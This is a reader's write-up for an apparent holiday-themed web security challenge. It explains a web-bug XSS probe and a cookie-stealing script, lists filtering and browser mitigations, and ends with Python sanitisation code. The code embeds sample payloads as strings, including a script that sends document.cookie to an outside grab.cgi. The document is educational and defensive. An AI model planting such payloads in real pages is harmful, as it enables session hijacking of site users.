
By David Lancaster

Here are my answers:
1. Netcat....

Uh....on 2nd thought....
1. The first piece of text was a test to see if the application was vulnerable to Cross-site scripting (XSS), by using a web-bug. If the application was vulnerable, when an elf viewed this wish, their browser would attempt to display the image at "http://www.bumblesnowmonster.com/Sample.jpg", but the elf would not be aware of the attempt since the height and width were set to 0. Presumably the child would have access to the server's logs and could verify if the XSS test succeeded.

2. The 2nd piece of text is a JavaScript XSS exploit which is designed to grab the elf's cookie to the wish-submission/naughty-or-nice web application. When an elf opened the page containing this wish, their browser would run the JavaScript, which would attempt to call the cgi at "http://www.bumblesnowmonster.com/cgi-bin/grab.cgi" with the contents of the elf's cookie (document.cookie) as an argument, with grab.cgi most likely logging the cookie to a file. The child could then duplicate the elf's cookie, log in to the naughty-or-nice application and wreak havoc!

3. Mods to web application:
Strip all HTML tags in wishes
Convert HTML tag delimiters (<, >) to equivalent HTML codes (&gt;, &lt;)
Convert HTML tag delimiters (<, >) to other characters ([, ])
Set up a filter that permits "normal" characters [a-zA-Z0-9, etc.] and filters out everything else.
Hash the cookie with the elf's IP address, so it could only be re-used at that IP.

Mods to browser:
Firewall off elves so that they cannot access the internet at all.
Configure their browsers so that JavaScript cannot read cookies.

4. Disable parsing of HTML messages (use text version of multipart, or display HTML unparsed)
Disable JavaScript entirely in email.
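The first two web-application mitigations listed above (strip tags, then encode the delimiters), shown as an added example that is not part of David Lancaster's answer or of the challenge site. The two sample wishes are constructed here to mimic the patterns his write-up describes; the hostname and paths are the ones quoted in the answer.

```python
import html
import re

# Constructed sample wishes (not the actual challenge submissions) that mimic the
# two patterns described in the answer: a zero-size web-bug image and a script
# that sends document.cookie to grab.cgi.
WEB_BUG_WISH = ('I want a pony <img src="http://www.bumblesnowmonster.com/Sample.jpg" '
                'width="0" height="0">')
COOKIE_WISH = ('I want a bike <script>document.location='
               '"http://www.bumblesnowmonster.com/cgi-bin/grab.cgi?"+document.cookie'
               '</script>')

# Anything from a '<' up to the next '>' is treated as a tag and removed.
TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(wish: str) -> str:
    """Mitigation 3a: remove everything that looks like a complete HTML tag.

    Stripping alone is brittle: a malformed tag such as '<img src=x' with no
    closing '>' does not match and survives, which is why encoding is applied
    afterwards as well.
    """
    return TAG_RE.sub("", wish)


def encode_wish(wish: str) -> str:
    """Mitigation 3b: convert tag delimiters (and quotes) to HTML entities so the
    elf's browser renders the wish as text instead of interpreting it."""
    return html.escape(wish, quote=True)


def safe_wish(wish: str) -> str:
    """Strip complete tags, then entity-encode whatever remains before the wish
    is written into the page the elves view."""
    return encode_wish(strip_tags(wish))


def contains_markup(rendered: str) -> bool:
    """Check used before rendering: are raw tag delimiters still present?"""
    return "<" in rendered or ">" in rendered
```

The server-side counterpart of the "JavaScript cannot read cookies" item is to set the cookie with the HttpOnly attribute, which keeps document.cookie from exposing it even if an encoding step is missed.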


©Copyright 2004, Ed Skoudis